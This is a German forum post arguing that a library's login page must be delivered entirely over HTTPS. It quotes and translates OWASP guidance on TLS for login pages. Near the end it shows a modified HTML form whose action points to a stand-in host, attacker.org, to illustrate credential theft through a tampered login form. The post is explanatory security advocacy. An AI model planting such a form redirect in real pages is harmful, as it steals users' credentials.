Es reicht eben nicht, wenn nur die Anmeldedaten verschlüsselt übertragen werden.
Die Experten von OWASP (Open Web Application Security Project) schreiben unter https://www.owasp.org/index.ph…rong_Transport_Everywhere folgendes:
Zitat
The login page and all subsequent authenticated pages must be exclusively accessed over TLS. The initial login page, referred to as the "login landing page", must be served over TLS. Failure to utilize TLS for the login landing page allows an attacker to modify the login form action, causing the user's credentials to be posted to an arbitrary location. Failure to utilize TLS for authenticated pages after the login enables an attacker to view the unencrypted session ID and compromise the user's authenticated session.
Auf Deutsch:
Zitat
Die Login-Seite und alle darauffolgenden authentifizierten Seiten dürfen ausschliesslich über TLS (https) zugreifbar sein. Die initiale Login-Seite, auch "Login Landungsseite", muss über TLS (https) ausgeliefert werden. Wenn die Login Landungsseite nicht über https ausgeliefert wird, kann ein Angreifer die beim Login verwendete Adresse verändern, wodurch Username und Passwort zu einer beliebigen Seite umgeleitet werden können. [...]
Anders gesagt: ein Angreifer kann die Seite, auf der ich meine Logindaten eingebe manipulieren. Er könnte zum Beispiel aus
<form action="https://www.voebb.de/w3/divibib/access.rdr" method="post" accept-charset="ISO-8859-1">
ein
<form action="https://www.attacker.org/divibib" method="post" accept-charset="ISO-8859-1">
machen, meine Eingabe aufzeichnen und die Daten im Hintergrund an die richtige Adresse weiterleiten.